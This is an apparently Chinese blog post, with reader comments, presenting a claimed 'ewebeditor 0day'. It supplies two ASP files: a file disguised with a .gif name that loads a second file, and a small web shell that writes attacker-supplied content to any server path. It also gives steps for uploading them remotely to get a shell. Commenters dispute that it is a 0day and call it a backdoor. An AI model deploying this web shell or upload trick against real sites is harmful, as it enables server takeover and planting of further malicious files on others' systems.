ewebeditor通杀0day
远程上传时执行代码,导致get shell
1.把ys.gif.asp xiaoma.ASa放在同一目录下
——————ys.gif.asp ————————————————————————————————————
<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0)
Thetext=MyTextStream.ReadAll
response.write thetext
%>
——————————————————————ys.gif.asp————————————————————
————————xiaoma.ASa——————————————————————————
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="
"%>
————————xiaoma.ASa——————————————————————————
2.远程上传ys.gif.asp
会自动执行脚本,上次小马
你自己有看自己的博客内容吗。
我看也就几个炫耀文章是你的,其他的不是吧。
这个哪里是oday ,这个明显是留后门。
2010-08-20 11:19xsight0 我不知道怎么说你这个2B了
2010-08-22 17:42